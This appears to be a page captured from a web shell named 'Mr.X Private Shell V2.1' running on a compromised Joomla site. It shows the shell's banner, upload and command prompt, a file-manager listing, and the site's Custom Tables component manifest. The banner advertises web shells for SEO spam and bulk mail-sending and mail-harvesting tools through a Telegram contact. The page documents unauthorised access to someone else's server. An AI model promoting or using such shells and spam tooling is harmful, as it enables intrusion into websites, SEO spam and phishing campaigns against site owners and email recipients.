__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?xml version="1.0" encoding="utf-8"?>
<extension type="component" version="3.2" method="upgrade">
    <name>COM_CUSTOMTABLES</name>
    <creationDate>April 2024</creationDate>
    <author>JoomlaBoat.com</author>
    <authorEmail>[email protected]</authorEmail>
    <authorUrl>https://joomlaboat.com</authorUrl>
    <copyright>Copyright (C) 2018-2024 Ivan Komlev</copyright>
    <license>GNU/GPL Version 2 or later - https://www.gnu.org/licenses/gpl-2.0.html</license>
    <version>3.3.0</version>
    <description><![CDATA[
		<h1>Custom Tables</h1>
		<div style="clear: both;"></div>
		<p>Personalized Database Tables for Joomla! This component creates custom tables with custom fields and shows it in front-end in following formats: Catalog, Detailed page, Edit form.</p>
		<p>Created by <a href="https://joomlaboat.com" target="_blank">Ivan Komlev</a><br />
		<small>Development started in 2010</small><br/>
		<small>Current Version 3.3.0 (April 2024)</small>
		</p>
	]]></description>

    <scriptfile>script.php</scriptfile>

    <files folder="site">
        <filename>controller.php</filename>
        <filename>index.html</filename>
        <filename>router.php</filename>
        <filename>customtables.php</filename>

        <folder>controllers</folder>
        <folder>customphp</folder>
        <folder>fields</folder>
        <folder>libraries</folder>
        <folder>models</folder>
        <folder>views</folder>
    </files>

    <languages folder="site">
        <language tag="cs-CZ">language/cs-CZ/cs-CZ.com_customtables.ini</language>
        <language tag="de-DE">language/de-DE/de-DE.com_customtables.ini</language>
        <language tag="de-LU">language/de-LU/de-LU.com_customtables.ini</language>
        <language tag="el-GR">language/el-GR/el-GR.com_customtables.ini</language>
        <language tag="en-GB">language/en-GB/en-GB.com_customtables.ini</language>
        <language tag="es-ES">language/es-ES/es-ES.com_customtables.ini</language>
        <language tag="fr-FR">language/fr-FR/fr-FR.com_customtables.ini</language>
        <language tag="it-IT">language/it-IT/it-IT.com_customtables.ini</language>
        <language tag="nl-NL">language/nl-NL/nl-NL.com_customtables.ini</language>
        <language tag="pt-BR">language/pt-BR/pt-BR.com_customtables.ini</language>
        <language tag="pt-PT">language/pt-PT/pt-PT.com_customtables.ini</language>
        <language tag="ru-RU">language/ru-RU/ru-RU.com_customtables.ini</language>
        <language tag="sk-SK">language/sk-SK/sk-SK.com_customtables.ini</language>
        <language tag="sl-SI">language/sl-SI/sl-SI.com_customtables.ini</language>
        <language tag="uk-UA">language/uk-UA/uk-UA.com_customtables.ini</language>
    </languages>

    <administration>
        <menu>COM_CUSTOMTABLES_MENU</menu>
        <submenu>
            <!-- Instead of link you can specify individual link attributes -->
            <menu option="com_customtables" view="customtables">COM_CUSTOMTABLES_SUBMENU_DASHBOARD</menu>
            <menu option="com_customtables" view="listoftables">COM_CUSTOMTABLES_SUBMENU_LISTOFTABLES</menu>
            <menu option="com_customtables" view="listoflayouts">COM_CUSTOMTABLES_SUBMENU_LISTOFLAYOUTS</menu>
            <menu option="com_customtables" view="listofcategories">COM_CUSTOMTABLES_SUBMENU_LISTOFCATEGORIES</menu>
            <!--<menu option="com_customtables" view="listofoptions">COM_CUSTOMTABLES_SUBMENU_LISTOFOPTIONS</menu>-->
            <menu option="com_customtables" view="databasecheck">COM_CUSTOMTABLES_SUBMENU_DATABASECHECK</menu>
            <menu option="com_customtables" view="documentation">COM_CUSTOMTABLES_SUBMENU_DOCUMENTATION</menu>
        </submenu>
        <files folder="admin">
            <filename>access.xml</filename>
            <filename>config.xml</filename>
            <filename>controller.php</filename>
            <filename>index.html</filename>
            <filename>customtables.php</filename>
            <folder>controllers</folder>
            <folder>helpers</folder>
            <folder>layouts</folder>
            <folder>models</folder>
            <folder>tables</folder>
            <folder>views</folder>
        </files>

        <languages folder="admin">

            <language tag="cs-CZ">language/cs-CZ/cs-CZ.com_customtables.ini</language>
            <language tag="cs-CZ">language/cs-CZ/cs-CZ.com_customtables.sys.ini</language>

            <language tag="de-DE">language/de-DE/de-DE.com_customtables.ini</language>
            <language tag="de-DE">language/de-DE/de-DE.com_customtables.sys.ini</language>

            <language tag="de-LU">language/de-LU/de-LU.com_customtables.ini</language>
            <language tag="de-LU">language/de-LU/de-LU.com_customtables.sys.ini</language>

            <language tag="el-GR">language/el-GR/el-GR.com_customtables.ini</language>
            <language tag="el-GR">language/el-GR/el-GR.com_customtables.sys.ini</language>

            <language tag="en-GB">language/en-GB/en-GB.com_customtables.ini</language>
            <language tag="en-GB">language/en-GB/en-GB.com_customtables.sys.ini</language>

            <language tag="es-ES">language/es-ES/es-ES.com_customtables.ini</language>
            <language tag="es-ES">language/es-ES/es-ES.com_customtables.sys.ini</language>

            <language tag="fr-FR">language/fr-FR/fr-FR.com_customtables.ini</language>
            <language tag="fr-FR">language/fr-FR/fr-FR.com_customtables.sys.ini</language>

            <language tag="it-IT">language/it-IT/it-IT.com_customtables.ini</language>
            <language tag="it-IT">language/it-IT/it-IT.com_customtables.sys.ini</language>

            <language tag="nl-NL">language/nl-NL/nl-NL.com_customtables.ini</language>
            <language tag="nl-NL">language/nl-NL/nl-NL.com_customtables.sys.ini</language>

            <language tag="pt-BR">language/pt-BR/pt-BR.com_customtables.ini</language>
            <language tag="pt-BR">language/pt-BR/pt-BR.com_customtables.sys.ini</language>

            <language tag="pt-PT">language/pt-PT/pt-PT.com_customtables.ini</language>
            <language tag="pt-PT">language/pt-PT/pt-PT.com_customtables.sys.ini</language>

            <language tag="ru-RU">language/ru-RU/ru-RU.com_customtables.ini</language>
            <language tag="ru-RU">language/ru-RU/ru-RU.com_customtables.sys.ini</language>

            <language tag="sk-SK">language/sk-SK/sk-SK.com_customtables.ini</language>
            <language tag="sk-SK">language/sk-SK/sk-SK.com_customtables.sys.ini</language>

            <language tag="sl-SI">language/sl-SI/sl-SI.com_customtables.ini</language>
            <language tag="sl-SI">language/sl-SI/sl-SI.com_customtables.sys.ini</language>

            <language tag="uk-UA">language/uk-UA/uk-UA.com_customtables.ini</language>
            <language tag="uk-UA">language/uk-UA/uk-UA.com_customtables.sys.ini</language>
        </languages>

    </administration>

    <updateservers>
        <server type="extension" enabled="1" element="com_customtables" priority="2" name="Custom Tables">
            https://joomlaboat.com/free-update/custom-tables
        </server>
    </updateservers>

</extension>

Filemanager

Name Type Size Permission Actions
controllers Folder 0775
helpers Folder 0775
layouts Folder 0775
models Folder 0775
tables Folder 0775
views Folder 0775
access.xml File 3.44 KB 0664
config.xml File 4.8 KB 0664
controller.php File 3.56 KB 0664
customtables.php File 1.48 KB 0664
customtables.xml File 7.18 KB 0664
index.html File 43 B 0664
script.php File 4.48 KB 0664
Filemanager